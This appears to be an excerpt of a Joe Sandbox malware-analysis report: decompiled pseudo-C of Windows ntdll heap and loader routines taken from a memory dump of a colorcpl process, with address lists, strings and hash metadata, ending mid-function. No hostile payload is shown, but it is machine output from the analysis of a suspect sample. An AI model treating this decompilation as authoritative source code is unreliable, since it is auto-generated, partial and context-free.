                                                                                                							_t241 = _v16;
                                                                                                							if(_t279 <= _t240) {
                                                                                                								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
                                                                                                								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
                                                                                                									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
                                                                                                									L26:
                                                                                                									_t243 = 0;
                                                                                                									 *((char*)(_t292 + 3)) = 0;
                                                                                                									_t276 = _t223[0x18];
                                                                                                									if(_t223[0x18] != _t223) {
                                                                                                										_t160 = (_t292 - _t223 >> 0x10) + 1;
                                                                                                										_v24 = _t160;
                                                                                                										__eflags = _t160 - 0xfe;
                                                                                                										if(_t160 >= 0xfe) {
                                                                                                											_push(0);
                                                                                                											_push(0);
                                                                                                											E06EDA80D(_t276, 3, _t292, _t223);
                                                                                                											_t160 = _v24;
                                                                                                										}
                                                                                                										_t243 = _t160;
                                                                                                									}
                                                                                                									 *((char*)(_t292 + 6)) = _t243;
                                                                                                									_t163 =  *( *[fs:0x30] + 0x50);
                                                                                                									if(_t163 != 0) {
                                                                                                										__eflags =  *_t163;
                                                                                                										if( *_t163 == 0) {
                                                                                                											goto L28;
                                                                                                										}
                                                                                                										_t227 = 0x7ffe0380;
                                                                                                										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                										goto L29;
                                                                                                									} else {
                                                                                                										L28:
                                                                                                										_t227 = 0x7ffe0380;
                                                                                                										_t164 = 0x7ffe0380;
                                                                                                										L29:
                                                                                                										if( *_t164 != 0) {
                                                                                                											_t165 =  *[fs:0x30];
                                                                                                											__eflags =  *(_t165 + 0x240) & 0x00000001;
                                                                                                											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
                                                                                                												__eflags = E06E37D50();
                                                                                                												if(__eflags != 0) {
                                                                                                													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                                                												}
                                                                                                												_t276 = _t292;
                                                                                                												E06ED1582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
                                                                                                											}
                                                                                                										}
                                                                                                										_t223 = 0x7ffe038a;
                                                                                                										_t167 =  *( *[fs:0x30] + 0x50);
                                                                                                										if(_t167 != 0) {
                                                                                                											__eflags =  *_t167;
                                                                                                											if( *_t167 == 0) {
                                                                                                												goto L31;
                                                                                                											}
                                                                                                											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                                                											goto L32;
                                                                                                										} else {
                                                                                                											L31:
                                                                                                											_t168 = _t223;
                                                                                                											L32:
                                                                                                											if( *_t168 != 0) {
                                                                                                												__eflags = E06E37D50();
                                                                                                												if(__eflags != 0) {
                                                                                                													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                                                													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                                                												}
                                                                                                												_t276 = _t292;
                                                                                                												E06ED1582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
                                                                                                											}
                                                                                                											_t131 = _t292;
                                                                                                											goto L34;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                								_t152 = _v20;
                                                                                                							}
                                                                                                							E06E3B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
                                                                                                							 *_v20 =  *_v20 << 3;
                                                                                                							goto L26;
                                                                                                						} else {
                                                                                                							_t283 =  *(_t291 + 0xb8);
                                                                                                							if(_t283 != 0) {
                                                                                                								_t190 =  *(_t238 + 0x14) >> 0xc;
                                                                                                								while(1) {
                                                                                                									__eflags = _t190 - _t283[1];
                                                                                                									if(_t190 < _t283[1]) {
                                                                                                										break;
                                                                                                									}
                                                                                                									_t252 =  *_t283;
                                                                                                									__eflags = _t252;
                                                                                                									_v24 = _t252;
                                                                                                									_t238 = _v16;
                                                                                                									if(_t252 == 0) {
                                                                                                										_t190 = _t283[1] - 1;
                                                                                                										__eflags = _t283[1] - 1;
                                                                                                										L70:
                                                                                                										E06E3BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
                                                                                                										_t238 = _v16;
                                                                                                										goto L19;
                                                                                                									}
                                                                                                									_t283 = _v24;
                                                                                                								}
                                                                                                								goto L70;
                                                                                                							}
                                                                                                							L19:
                                                                                                							_t193 =  *_t238;
                                                                                                							_t284 =  *((intOrPtr*)(_t238 + 4));
                                                                                                							_t254 =  *((intOrPtr*)(_t193 + 4));
                                                                                                							_v24 = _t254;
                                                                                                							_t238 = _v16;
                                                                                                							if( *_t284 != _t254 ||  *_t284 != _t238) {
                                                                                                								_push(_t238);
                                                                                                								_push( *_t284);
                                                                                                								E06EDA80D(0, 0xd, _t238, _v24);
                                                                                                								_t238 = _v16;
                                                                                                							} else {
                                                                                                								 *_t284 = _t193;
                                                                                                								 *((intOrPtr*)(_t193 + 4)) = _t284;
                                                                                                							}
                                                                                                							goto L22;
                                                                                                						}
                                                                                                					}
                                                                                                					L10:
                                                                                                					_t144 = 0x7ffe0380;
                                                                                                					goto L11;
                                                                                                				}
                                                                                                			}

                                                                                                0x06e3b6a0
                                                                                                0x06e82b4f
                                                                                                0x06e82b52
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e82b61
                                                                                                0x00000000
                                                                                                0x06e3b6a6
                                                                                                0x06e3b6a6
                                                                                                0x06e3b6a6
                                                                                                0x06e3b6a8
                                                                                                0x06e3b6ab
                                                                                                0x06e82b70
                                                                                                0x06e82b72
                                                                                                0x06e82b7d
                                                                                                0x06e82b7d
                                                                                                0x06e82b7d
                                                                                                0x06e82b86
                                                                                                0x06e82b97
                                                                                                0x06e82b97
                                                                                                0x06e3b6b1
                                                                                                0x00000000
                                                                                                0x06e3b6b1
                                                                                                0x06e3b6a0
                                                                                                0x06e3b67a
                                                                                                0x06e3b722
                                                                                                0x06e3b722
                                                                                                0x06e3b655
                                                                                                0x06e3b65d
                                                                                                0x00000000
                                                                                                0x06e3b5c6
                                                                                                0x06e3b5c6
                                                                                                0x06e3b5ce
                                                                                                0x06e82a83
                                                                                                0x06e82a97
                                                                                                0x06e82a97
                                                                                                0x06e82a9a
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e82a88
                                                                                                0x06e82a8a
                                                                                                0x06e82a8c
                                                                                                0x06e82a8f
                                                                                                0x06e82a92
                                                                                                0x06e82aa1
                                                                                                0x06e82aa1
                                                                                                0x06e82aa2
                                                                                                0x06e82aab
                                                                                                0x06e82ab0
                                                                                                0x00000000
                                                                                                0x06e82ab0
                                                                                                0x06e82a94
                                                                                                0x06e82a94
                                                                                                0x00000000
                                                                                                0x06e82a9c
                                                                                                0x06e3b5d4
                                                                                                0x06e3b5d4
                                                                                                0x06e3b5d6
                                                                                                0x06e3b5d9
                                                                                                0x06e3b5de
                                                                                                0x06e3b5e1
                                                                                                0x06e3b5e4
                                                                                                0x06e82ab8
                                                                                                0x06e82ab9
                                                                                                0x06e82ac4
                                                                                                0x06e82ac9
                                                                                                0x06e3b5f2
                                                                                                0x06e3b5f2
                                                                                                0x06e3b5f4
                                                                                                0x06e3b5f4
                                                                                                0x00000000
                                                                                                0x06e3b5e4
                                                                                                0x06e3b5c4
                                                                                                0x06e3b554
                                                                                                0x06e3b554
                                                                                                0x00000000
                                                                                                0x06e3b554

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                • API String ID: 0-4253913091
                                                                                                • Opcode ID: 4826e2d219deefd62451b84948e17b4979a166199ce84a5d39312cccf5221b6c
                                                                                                • Instruction ID: a6eb6dbb229bcdb7e322711b91bc82b7b0d5e34ada23e13b65c1545658b0836e
                                                                                                • Opcode Fuzzy Hash: 4826e2d219deefd62451b84948e17b4979a166199ce84a5d39312cccf5221b6c
                                                                                                • Instruction Fuzzy Hash: 46E1BE70A10355EFDB98DF68C888BBAB7B5FF44304F1091A9E51A9B391D730EA41CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 83%
                                                                                                			E06E28794(void* __ecx) {
                                                                                                				signed int _v0;
                                                                                                				char _v8;
                                                                                                				signed int _v12;
                                                                                                				void* _v16;
                                                                                                				signed int _v20;
                                                                                                				intOrPtr _v24;
                                                                                                				signed int _v28;
                                                                                                				signed int _v32;
                                                                                                				signed int _v40;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr* _t77;
                                                                                                				signed int _t80;
                                                                                                				signed char _t81;
                                                                                                				signed int _t87;
                                                                                                				signed int _t91;
                                                                                                				void* _t92;
                                                                                                				void* _t94;
                                                                                                				signed int _t95;
                                                                                                				signed int _t103;
                                                                                                				signed int _t105;
                                                                                                				signed int _t110;
                                                                                                				signed int _t118;
                                                                                                				intOrPtr* _t121;
                                                                                                				intOrPtr _t122;
                                                                                                				signed int _t125;
                                                                                                				signed int _t129;
                                                                                                				signed int _t131;
                                                                                                				signed int _t134;
                                                                                                				signed int _t136;
                                                                                                				signed int _t143;
                                                                                                				signed int* _t147;
                                                                                                				signed int _t151;
                                                                                                				void* _t153;
                                                                                                				signed int* _t157;
                                                                                                				signed int _t159;
                                                                                                				signed int _t161;
                                                                                                				signed int _t166;
                                                                                                				signed int _t168;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t153 = __ecx;
                                                                                                				_t159 = 0;
                                                                                                				_t121 = __ecx + 0x3c;
                                                                                                				if( *_t121 == 0) {
                                                                                                					L2:
                                                                                                					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                                                                					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                                                                						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                                                                						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                                                                						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                                                                							L6:
                                                                                                							if(E06E2934A() != 0) {
                                                                                                								_t159 = E06E9A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                                                                								__eflags = _t159;
                                                                                                								if(_t159 < 0) {
                                                                                                									_t81 =  *0x6f05780; // 0x0
                                                                                                									__eflags = _t81 & 0x00000003;
                                                                                                									if((_t81 & 0x00000003) != 0) {
                                                                                                										_push(_t159);
                                                                                                										E06E95510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                                                                										_t81 =  *0x6f05780; // 0x0
                                                                                                									}
                                                                                                									__eflags = _t81 & 0x00000010;
                                                                                                									if((_t81 & 0x00000010) != 0) {
                                                                                                										asm("int3");
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t159 = E06E2849B(0, _t122, _t153, _t159, _t180);
                                                                                                							if(_t159 >= 0) {
                                                                                                								goto L6;
                                                                                                							}
                                                                                                						}
                                                                                                						_t80 = _t159;
                                                                                                						goto L8;
                                                                                                					} else {
                                                                                                						_t125 = 0x13;
                                                                                                						asm("int 0x29");
                                                                                                						_push(0);
                                                                                                						_push(_t159);
                                                                                                						_t161 = _t125;
                                                                                                						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                                                                						_t143 = 0;
                                                                                                						_v40 = _t161;
                                                                                                						_t118 = 0;
                                                                                                						_push(_t153);
                                                                                                						__eflags = _t87;
                                                                                                						if(_t87 != 0) {
                                                                                                							_t118 = _t87 + 0x5d8;
                                                                                                							__eflags = _t118;
                                                                                                							if(_t118 == 0) {
                                                                                                								L46:
                                                                                                								_t118 = 0;
                                                                                                							} else {
                                                                                                								__eflags =  *(_t118 + 0x30);
                                                                                                								if( *(_t118 + 0x30) == 0) {
                                                                                                									goto L46;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_v32 = 0;
                                                                                                						_v28 = 0;
                                                                                                						_v16 = 0;
                                                                                                						_v20 = 0;
                                                                                                						_v12 = 0;
                                                                                                						__eflags = _t118;
                                                                                                						if(_t118 != 0) {
                                                                                                							__eflags = _t161;
                                                                                                							if(_t161 != 0) {
                                                                                                								__eflags =  *(_t118 + 8);
                                                                                                								if( *(_t118 + 8) == 0) {
                                                                                                									L22:
                                                                                                									_t143 = 1;
                                                                                                									__eflags = 1;
                                                                                                								} else {
                                                                                                									_t19 = _t118 + 0x40; // 0x40
                                                                                                									_t156 = _t19;
                                                                                                									E06E28999(_t19,  &_v16);
                                                                                                									__eflags = _v0;
                                                                                                									if(_v0 != 0) {
                                                                                                										__eflags = _v0 - 1;
                                                                                                										if(_v0 != 1) {
                                                                                                											goto L22;
                                                                                                										} else {
                                                                                                											_t128 =  *(_t161 + 0x64);
                                                                                                											__eflags =  *(_t161 + 0x64);
                                                                                                											if( *(_t161 + 0x64) == 0) {
                                                                                                												goto L22;
                                                                                                											} else {
                                                                                                												E06E28999(_t128,  &_v12);
                                                                                                												_t147 = _v12;
                                                                                                												_t91 = 0;
                                                                                                												__eflags = 0;
                                                                                                												_t129 =  *_t147;
                                                                                                												while(1) {
                                                                                                													__eflags =  *((intOrPtr*)(0x6f05c60 + _t91 * 8)) - _t129;
                                                                                                													if( *((intOrPtr*)(0x6f05c60 + _t91 * 8)) == _t129) {
                                                                                                														break;
                                                                                                													}
                                                                                                													_t91 = _t91 + 1;
                                                                                                													__eflags = _t91 - 5;
                                                                                                													if(_t91 < 5) {
                                                                                                														continue;
                                                                                                													} else {
                                                                                                														_t131 = 0;
                                                                                                														__eflags = 0;
                                                                                                													}
                                                                                                													L37:
                                                                                                													__eflags = _t131;
                                                                                                													if(_t131 != 0) {
                                                                                                														goto L22;
                                                                                                													} else {
                                                                                                														__eflags = _v16 - _t147;
                                                                                                														if(_v16 != _t147) {
                                                                                                															goto L22;
                                                                                                														} else {
                                                                                                															E06E32280(_t92, 0x6f086cc);
                                                                                                															_t94 = E06EE9DFB( &_v20);
                                                                                                															__eflags = _t94 - 1;
                                                                                                															if(_t94 != 1) {
                                                                                                															}
                                                                                                															asm("movsd");
                                                                                                															asm("movsd");
                                                                                                															asm("movsd");
                                                                                                															asm("movsd");
                                                                                                															 *_t118 =  *_t118 + 1;
                                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                                															_t95 = E06E461A0( &_v32);
                                                                                                															__eflags = _t95;
                                                                                                															if(_t95 != 0) {
                                                                                                																__eflags = _v32 | _v28;
                                                                                                																if((_v32 | _v28) != 0) {
                                                                                                																	_t71 = _t118 + 0x40; // 0x3f
                                                                                                																	_t134 = _t71;
                                                                                                																	goto L55;
                                                                                                																}
                                                                                                															}
                                                                                                															goto L30;
                                                                                                														}
                                                                                                													}
                                                                                                													goto L56;
                                                                                                												}
                                                                                                												_t92 = 0x6f05c64 + _t91 * 8;
                                                                                                												asm("lock xadd [eax], ecx");
                                                                                                												_t131 = (_t129 | 0xffffffff) - 1;
                                                                                                												goto L37;
                                                                                                											}
                                                                                                										}
                                                                                                										goto L56;
                                                                                                									} else {
                                                                                                										_t143 = E06E28A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                                                                										__eflags = _t143;
                                                                                                										if(_t143 != 0) {
                                                                                                											_t157 = _v12;
                                                                                                											_t103 = 0;
                                                                                                											__eflags = 0;
                                                                                                											_t136 =  &(_t157[1]);
                                                                                                											 *(_t161 + 0x64) = _t136;
                                                                                                											_t151 =  *_t157;
                                                                                                											_v20 = _t136;
                                                                                                											while(1) {
                                                                                                												__eflags =  *((intOrPtr*)(0x6f05c60 + _t103 * 8)) - _t151;
                                                                                                												if( *((intOrPtr*)(0x6f05c60 + _t103 * 8)) == _t151) {
                                                                                                													break;
                                                                                                												}
                                                                                                												_t103 = _t103 + 1;
                                                                                                												__eflags = _t103 - 5;
                                                                                                												if(_t103 < 5) {
                                                                                                													continue;
                                                                                                												}
                                                                                                												L21:
                                                                                                												_t105 = E06E5F380(_t136, 0x6df1184, 0x10);
                                                                                                												__eflags = _t105;
                                                                                                												if(_t105 != 0) {
                                                                                                													__eflags =  *_t157 -  *_v16;
                                                                                                													if( *_t157 >=  *_v16) {
                                                                                                														goto L22;
                                                                                                													} else {
                                                                                                														asm("cdq");
                                                                                                														_t166 = _t157[5] & 0x0000ffff;
                                                                                                														_t108 = _t157[5] & 0x0000ffff;
                                                                                                														asm("cdq");
                                                                                                														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                                                                														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                                                                														if(__eflags > 0) {
                                                                                                															L29:
                                                                                                															E06E32280(_t108, 0x6f086cc);
                                                                                                															 *_t118 =  *_t118 + 1;
                                                                                                															_t42 = _t118 + 0x40; // 0x3f
                                                                                                															_t156 = _t42;
                                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                                															asm("movsd");
                                                                                                															asm("movsd");
                                                                                                															asm("movsd");
                                                                                                															asm("movsd");
                                                                                                															_t110 = E06E461A0( &_v32);
                                                                                                															__eflags = _t110;
                                                                                                															if(_t110 != 0) {
                                                                                                																__eflags = _v32 | _v28;
                                                                                                																if((_v32 | _v28) != 0) {
                                                                                                																	_t134 = _v20;
                                                                                                																	L55:
                                                                                                																	E06EE9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                                                                																}
                                                                                                															}
                                                                                                															L30:
                                                                                                															 *_t118 =  *_t118 + 1;
                                                                                                															asm("adc dword [ebx+0x4], 0x0");
                                                                                                															E06E2FFB0(_t118, _t156, 0x6f086cc);
                                                                                                															goto L22;
                                                                                                														} else {
                                                                                                															if(__eflags < 0) {
                                                                                                																goto L22;
                                                                                                															} else {
                                                                                                																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                                                                																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                                                                																	goto L22;
                                                                                                																} else {
                                                                                                																	goto L29;
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													}
                                                                                                													goto L56;
                                                                                                												}
                                                                                                												goto L22;
                                                                                                											}
                                                                                                											asm("lock inc dword [eax]");
                                                                                                											goto L21;
                                                                                                										}
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						return _t143;
                                                                                                					}
                                                                                                				} else {
                                                                                                					_push( &_v8);
                                                                                                					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                                                                					_push(__ecx + 0x40);
                                                                                                					_push(_t121);
                                                                                                					_push(0xffffffff);
                                                                                                					_t80 = E06E59A00();
                                                                                                					_t159 = _t80;
                                                                                                					if(_t159 < 0) {
                                                                                                						L8:
                                                                                                						return _t80;
                                                                                                					} else {
                                                                                                						goto L2;
                                                                                                					}
                                                                                                				}
                                                                                                				L56:
                                                                                                			}












































                                                                                                0x06e2887d
                                                                                                0x06e2887f
                                                                                                0x06e28881
                                                                                                0x06e28884
                                                                                                0x06e28884
                                                                                                0x06e28886
                                                                                                0x06e28889
                                                                                                0x06e2888c
                                                                                                0x06e2888e
                                                                                                0x06e28891
                                                                                                0x06e28891
                                                                                                0x06e28898
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2889a
                                                                                                0x06e2889b
                                                                                                0x06e2889e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e288a0
                                                                                                0x06e288a8
                                                                                                0x06e288b0
                                                                                                0x06e288b2
                                                                                                0x06e288d3
                                                                                                0x06e288d5
                                                                                                0x00000000
                                                                                                0x06e288d7
                                                                                                0x06e288db
                                                                                                0x06e288dc
                                                                                                0x06e288e0
                                                                                                0x06e288e8
                                                                                                0x06e288ee
                                                                                                0x06e288f0
                                                                                                0x06e288f3
                                                                                                0x06e288fc
                                                                                                0x06e28901
                                                                                                0x06e28906
                                                                                                0x06e2890c
                                                                                                0x06e2890c
                                                                                                0x06e2890f
                                                                                                0x06e28916
                                                                                                0x06e28917
                                                                                                0x06e28918
                                                                                                0x06e28919
                                                                                                0x06e2891a
                                                                                                0x06e2891f
                                                                                                0x06e28921
                                                                                                0x06e79c52
                                                                                                0x06e79c55
                                                                                                0x06e79c5b
                                                                                                0x06e79cac
                                                                                                0x06e79cc0
                                                                                                0x06e79cc0
                                                                                                0x06e79c55
                                                                                                0x06e28927
                                                                                                0x06e28927
                                                                                                0x06e2892f
                                                                                                0x06e28933
                                                                                                0x00000000
                                                                                                0x06e288f5
                                                                                                0x06e288f5
                                                                                                0x00000000
                                                                                                0x06e288f7
                                                                                                0x06e288f7
                                                                                                0x06e288fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e288fa
                                                                                                0x06e288f5
                                                                                                0x06e288f3
                                                                                                0x00000000
                                                                                                0x06e288d5
                                                                                                0x00000000
                                                                                                0x06e288b2
                                                                                                0x06e288c9
                                                                                                0x00000000
                                                                                                0x06e288c9
                                                                                                0x06e2887f
                                                                                                0x06e2886a
                                                                                                0x06e28857
                                                                                                0x06e28852
                                                                                                0x06e288bf
                                                                                                0x06e288bf
                                                                                                0x06e287aa
                                                                                                0x06e287ad
                                                                                                0x06e287ae
                                                                                                0x06e287b4
                                                                                                0x06e287b5
                                                                                                0x06e287b6
                                                                                                0x06e287b8
                                                                                                0x06e287bd
                                                                                                0x06e287c1
                                                                                                0x06e287f4
                                                                                                0x06e287fa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e287c1
                                                                                                0x00000000

                                                                                                Strings
                                                                                                • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 06E79C18
                                                                                                • LdrpDoPostSnapWork, xrefs: 06E79C1E
                                                                                                • minkernel\ntdll\ldrsnap.c, xrefs: 06E79C28
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmp
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeThunk
                                                                                                • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                                                                • API String ID: 2994545307-1948996284
                                                                                                • Opcode ID: 83586ee5cc938e19ce02aa73f43eabe138767f9081bd4975948a7922dde87258
                                                                                                • Instruction ID: 02f81e1f385f0aa429b2460034352c2736c70122f3efb7da0ee796477b9696a8
                                                                                                • Opcode Fuzzy Hash: 83586ee5cc938e19ce02aa73f43eabe138767f9081bd4975948a7922dde87258
                                                                                                • Instruction Fuzzy Hash: 6591D131A1032AAFEF98DF58C8809BB73BAFF54314B55A069D915AB241D730ED09CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 80%
                                                                                                			E06E4AC7B(void* __ecx, signed short* __edx) {
                                                                                                				signed int _v8;
                                                                                                				signed int _v12;
                                                                                                				void* __ebx;
                                                                                                				signed char _t75;
                                                                                                				signed int _t79;
                                                                                                				signed int _t88;
                                                                                                				intOrPtr _t89;
                                                                                                				signed int _t96;
                                                                                                				signed char* _t97;
                                                                                                				intOrPtr _t98;
                                                                                                				signed int _t101;
                                                                                                				signed char* _t102;
                                                                                                				intOrPtr _t103;
                                                                                                				signed int _t105;
                                                                                                				signed char* _t106;
                                                                                                				signed int _t131;
                                                                                                				signed int _t138;
                                                                                                				void* _t149;
                                                                                                				signed short* _t150;
                                                                                                
                                                                                                				_t150 = __edx;
                                                                                                				_t149 = __ecx;
                                                                                                				_t70 =  *__edx & 0x0000ffff;
                                                                                                				__edx[1] = __edx[1] & 0x000000f8;
                                                                                                				__edx[3] = 0;
                                                                                                				_v8 =  *__edx & 0x0000ffff;
                                                                                                				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
                                                                                                					_t39 =  &(_t150[8]); // 0x8
                                                                                                					E06E6D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
                                                                                                					__edx[1] = __edx[1] | 0x00000004;
                                                                                                				}
                                                                                                				_t75 =  *(_t149 + 0xcc) ^  *0x6f08a68;
                                                                                                				if(_t75 != 0) {
                                                                                                					L4:
                                                                                                					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
                                                                                                						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
                                                                                                						_t79 =  *(_t149 + 0x50);
                                                                                                						 *_t150 =  *_t150 ^ _t79;
                                                                                                						return _t79;
                                                                                                					}
                                                                                                					return _t75;
                                                                                                				} else {
                                                                                                					_t9 =  &(_t150[0x80f]); // 0x1017
                                                                                                					_t138 = _t9 & 0xfffff000;
                                                                                                					_t10 =  &(_t150[0x14]); // 0x20
                                                                                                					_v12 = _t138;
                                                                                                					if(_t138 == _t10) {
                                                                                                						_t138 = _t138 + 0x1000;
                                                                                                						_v12 = _t138;
                                                                                                					}
                                                                                                					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
                                                                                                					if(_t75 > _t138) {
                                                                                                						_v8 = _t75 - _t138;
                                                                                                						_push(0x4000);
                                                                                                						_push( &_v8);
                                                                                                						_push( &_v12);
                                                                                                						_push(0xffffffff);
                                                                                                						_t131 = E06E596E0();
                                                                                                						__eflags = _t131 - 0xc0000045;
                                                                                                						if(_t131 == 0xc0000045) {
                                                                                                							_t88 = E06EC3C60(_v12, _v8);
                                                                                                							__eflags = _t88;
                                                                                                							if(_t88 != 0) {
                                                                                                								_push(0x4000);
                                                                                                								_push( &_v8);
                                                                                                								_push( &_v12);
                                                                                                								_push(0xffffffff);
                                                                                                								_t131 = E06E596E0();
                                                                                                							}
                                                                                                						}
                                                                                                						_t89 =  *[fs:0x30];
                                                                                                						__eflags = _t131;
                                                                                                						if(_t131 < 0) {
                                                                                                							__eflags =  *(_t89 + 0xc);
                                                                                                							if( *(_t89 + 0xc) == 0) {
                                                                                                								_push("HEAP: ");
                                                                                                								E06E1B150();
                                                                                                							} else {
                                                                                                								E06E1B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                                                							}
                                                                                                							_push(_v8);
                                                                                                							_push(_v12);
                                                                                                							_push(_t149);
                                                                                                							_t75 = E06E1B150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
                                                                                                							goto L4;
                                                                                                						} else {
                                                                                                							_t96 =  *(_t89 + 0x50);
                                                                                                							_t132 = 0x7ffe0380;
                                                                                                							__eflags = _t96;
                                                                                                							if(_t96 != 0) {
                                                                                                								__eflags =  *_t96;
                                                                                                								if( *_t96 == 0) {
                                                                                                									goto L10;
                                                                                                								}
                                                                                                								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                								L11:
                                                                                                								__eflags =  *_t97;
                                                                                                								if( *_t97 != 0) {
                                                                                                									_t98 =  *[fs:0x30];
                                                                                                									__eflags =  *(_t98 + 0x240) & 0x00000001;
                                                                                                									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
                                                                                                										E06ED14FB(_t132, _t149, _v12, _v8, 7);
                                                                                                									}
                                                                                                								}
                                                                                                								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
                                                                                                								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
                                                                                                								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
                                                                                                								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
                                                                                                								_t101 =  *( *[fs:0x30] + 0x50);
                                                                                                								__eflags = _t101;
                                                                                                								if(_t101 != 0) {
                                                                                                									__eflags =  *_t101;
                                                                                                									if( *_t101 == 0) {
                                                                                                										goto L13;
                                                                                                									}
                                                                                                									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
                                                                                                									goto L14;
                                                                                                								} else {
                                                                                                									L13:
                                                                                                									_t102 = _t132;
                                                                                                									L14:
                                                                                                									__eflags =  *_t102;
                                                                                                									if( *_t102 != 0) {
                                                                                                										_t103 =  *[fs:0x30];
